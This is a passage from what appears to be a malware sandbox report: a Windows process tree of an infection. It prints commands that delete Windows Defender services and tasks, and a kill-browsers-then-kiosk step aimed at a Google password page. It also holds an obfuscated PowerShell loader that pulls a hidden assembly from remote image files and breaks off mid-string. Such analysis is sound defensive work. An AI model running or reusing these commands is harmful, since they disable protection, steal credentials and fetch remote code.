                      8⤵
                      • Launches sc.exe
                      PID:1948
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      8⤵
                      • Delays execution with timeout.exe
                      PID:4724
                    • C:\Windows\system32\sc.exe
                      sc stop ddrver
                      8⤵
                      • Launches sc.exe
                      PID:884
                    • C:\Windows\system32\sc.exe
                      sc start ddrver
                      8⤵
                      • Launches sc.exe
                      PID:2552
                    • C:\Windows\system32\takeown.exe
                      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                      8⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:1140
                    • C:\Windows\system32\icacls.exe
                      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                      8⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:2932
                    • C:\Windows\system32\sc.exe
                      sc stop "WinDefend"
                      8⤵
                      • Launches sc.exe
                      PID:1708
                    • C:\Windows\system32\sc.exe
                      sc delete "WinDefend"
                      8⤵
                      • Launches sc.exe
                      PID:5400
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                      8⤵
                        PID:244
                      • C:\Windows\system32\sc.exe
                        sc stop "MDCoreSvc"
                        8⤵
                        • Launches sc.exe
                        PID:5112
                      • C:\Windows\system32\sc.exe
                        sc delete "MDCoreSvc"
                        8⤵
                        • Launches sc.exe
                        PID:3508
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                        8⤵
                          PID:2196
                        • C:\Windows\system32\sc.exe
                          sc stop "WdNisSvc"
                          8⤵
                          • Launches sc.exe
                          PID:1752
                        • C:\Windows\system32\sc.exe
                          sc delete "WdNisSvc"
                          8⤵
                          • Launches sc.exe
                          PID:4448
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                          8⤵
                            PID:2836
                          • C:\Windows\system32\sc.exe
                            sc stop "Sense"
                            8⤵
                            • Launches sc.exe
                            PID:2272
                          • C:\Windows\system32\sc.exe
                            sc delete "Sense"
                            8⤵
                            • Launches sc.exe
                            PID:1932
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                            8⤵
                              PID:2668
                            • C:\Windows\system32\sc.exe
                              sc stop "wscsvc"
                              8⤵
                              • Launches sc.exe
                              PID:4384
                            • C:\Windows\system32\sc.exe
                              sc delete "wscsvc"
                              8⤵
                              • Launches sc.exe
                              PID:3124
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                              8⤵
                              • Modifies security service
                              PID:3632
                            • C:\Windows\system32\sc.exe
                              sc stop "SgrmBroker"
                              8⤵
                              • Launches sc.exe
                              PID:5316
                            • C:\Windows\system32\sc.exe
                              sc delete "SgrmBroker"
                              8⤵
                              • Launches sc.exe
                              PID:2672
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                              8⤵
                                PID:3324
                              • C:\Windows\system32\sc.exe
                                sc stop "SecurityHealthService"
                                8⤵
                                • Launches sc.exe
                                PID:3240
                              • C:\Windows\system32\sc.exe
                                sc delete "SecurityHealthService"
                                8⤵
                                • Launches sc.exe
                                PID:3772
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                8⤵
                                  PID:4236
                                • C:\Windows\system32\sc.exe
                                  sc stop "webthreatdefsvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:2708
                                • C:\Windows\system32\sc.exe
                                  sc delete "webthreatdefsvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:2664
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                  8⤵
                                    PID:3388
                                  • C:\Windows\system32\sc.exe
                                    sc stop "webthreatdefusersvc"
                                    8⤵
                                    • Launches sc.exe
                                    PID:3664
                                  • C:\Windows\system32\sc.exe
                                    sc delete "webthreatdefusersvc"
                                    8⤵
                                    • Launches sc.exe
                                    PID:1096
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                    8⤵
                                      PID:552
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdNisDrv"
                                      8⤵
                                      • Launches sc.exe
                                      PID:2004
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdNisDrv"
                                      8⤵
                                      • Launches sc.exe
                                      PID:3984
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                      8⤵
                                        PID:6048
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdBoot"
                                        8⤵
                                        • Launches sc.exe
                                        PID:1256
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdBoot"
                                        8⤵
                                        • Launches sc.exe
                                        PID:4648
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                        8⤵
                                          PID:1060
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdFilter"
                                          8⤵
                                          • Launches sc.exe
                                          PID:4100
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdFilter"
                                          8⤵
                                          • Launches sc.exe
                                          PID:4108
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                          8⤵
                                            PID:5720
                                          • C:\Windows\system32\sc.exe
                                            sc stop "SgrmAgent"
                                            8⤵
                                            • Launches sc.exe
                                            PID:5804
                                          • C:\Windows\system32\sc.exe
                                            sc delete "SgrmAgent"
                                            8⤵
                                            • Launches sc.exe
                                            PID:2724
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                            8⤵
                                              PID:3896
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecWfp"
                                              8⤵
                                              • Launches sc.exe
                                              PID:3612
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecWfp"
                                              8⤵
                                              • Launches sc.exe
                                              PID:4060
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                              8⤵
                                                PID:2380
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecFlt"
                                                8⤵
                                                • Launches sc.exe
                                                PID:5664
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecFlt"
                                                8⤵
                                                • Launches sc.exe
                                                PID:2924
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                8⤵
                                                  PID:2616
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecCore"
                                                  8⤵
                                                  • Launches sc.exe
                                                  PID:2360
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecCore"
                                                  8⤵
                                                  • Launches sc.exe
                                                  PID:5500
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                  8⤵
                                                    PID:4360
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                    8⤵
                                                      PID:628
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                      8⤵
                                                        PID:3848
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                        8⤵
                                                          PID:1696
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                          8⤵
                                                            PID:3556
                                                          • C:\Windows\system32\sc.exe
                                                            sc stop ddrver
                                                            8⤵
                                                            • Launches sc.exe
                                                            PID:1668
                                                          • C:\Windows\system32\sc.exe
                                                            sc delete ddrver
                                                            8⤵
                                                            • Launches sc.exe
                                                            PID:4508
                                                • C:\Users\Admin\AppData\Local\Temp\10338710101\2ca20dc6fd.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10338710101\2ca20dc6fd.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:2392
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2916
                                                • C:\Users\Admin\AppData\Local\Temp\10338720101\52a2a2b1c0.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10338720101\52a2a2b1c0.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:5320
                                                • C:\Users\Admin\AppData\Local\Temp\10338730101\82d34f702b.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10338730101\82d34f702b.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:752
                                                • C:\Users\Admin\AppData\Local\Temp\10338740101\e2b678bfa3.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10338740101\e2b678bfa3.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:2648
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM firefox.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1020
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM chrome.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4500
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM msedge.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2360
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM opera.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1280
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM brave.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4560
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                    4⤵
                                                      PID:2112
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                        5⤵
                                                        • Drops desktop.ini file(s)
                                                        • Checks processor information in registry
                                                        • Modifies registry class
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:5644
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1984 -prefsLen 27099 -prefMapHandle 1988 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {cc20c514-f70f-4e64-9338-9185475cda7a} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                          6⤵
                                                            PID:2192
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2484 -prefsLen 27135 -prefMapHandle 2488 -prefMapSize 270279 -ipcHandle 2496 -initialChannelId {de67165d-ab48-4fe0-81ee-f25702b790f2} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                            6⤵
                                                              PID:5520
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3836 -prefsLen 25164 -prefMapHandle 3840 -prefMapSize 270279 -jsInitHandle 3844 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3852 -initialChannelId {c603e842-53df-4324-aff6-806614537042} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                              6⤵
                                                              • Checks processor information in registry
                                                              PID:5036
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4004 -prefsLen 27276 -prefMapHandle 4008 -prefMapSize 270279 -ipcHandle 4108 -initialChannelId {52231a63-46ac-4c7e-98bf-ccd257fa97ca} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                              6⤵
                                                                PID:4368
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4448 -prefsLen 34775 -prefMapHandle 4452 -prefMapSize 270279 -jsInitHandle 4456 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4464 -initialChannelId {30449789-ca14-475c-abef-53934f6abe26} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                6⤵
                                                                • Checks processor information in registry
                                                                PID:4504
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5064 -prefsLen 35012 -prefMapHandle 5068 -prefMapSize 270279 -ipcHandle 5076 -initialChannelId {4eba272b-9a16-4d86-b3b6-c876a415bcae} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                6⤵
                                                                • Checks processor information in registry
                                                                PID:6016
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5364 -prefsLen 32952 -prefMapHandle 5368 -prefMapSize 270279 -jsInitHandle 5372 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5344 -initialChannelId {23fbfca1-f82f-4814-88e1-190d726b33be} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                6⤵
                                                                • Checks processor information in registry
                                                                PID:5472
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5612 -prefsLen 32952 -prefMapHandle 5608 -prefMapSize 270279 -jsInitHandle 5604 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5600 -initialChannelId {6ec97283-344e-427e-9534-f086a554faf1} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                6⤵
                                                                • Checks processor information in registry
                                                                PID:5584
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5772 -prefsLen 32952 -prefMapHandle 5776 -prefMapSize 270279 -jsInitHandle 5780 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5788 -initialChannelId {7b8be49a-63da-45af-b1fb-0c0326a3f47c} -parentPid 5644 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5644" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                6⤵
                                                                • Checks processor information in registry
                                                                PID:468
                                                        • C:\Users\Admin\AppData\Local\Temp\10338750101\b96a5473ba.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10338750101\b96a5473ba.exe"
                                                          3⤵
                                                          • Modifies Windows Defender DisableAntiSpyware settings
                                                          • Modifies Windows Defender Real-time Protection settings
                                                          • Modifies Windows Defender TamperProtection settings
                                                          • Modifies Windows Defender notification settings
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Windows security modification
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:6000
                                                        • C:\Users\Admin\AppData\Local\Temp\10338760101\Q1DOy22.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10338760101\Q1DOy22.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          PID:4296
                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                            cmd.exe /c 67e2ff36de8a3.vbs
                                                            4⤵
                                                            • Checks computer location settings
                                                            • Modifies registry class
                                                            PID:3084
                                                            • C:\Windows\System32\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e2ff36de8a3.vbs"
                                                              5⤵
                                                              • Checks computer location settings
                                                              PID:5864
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@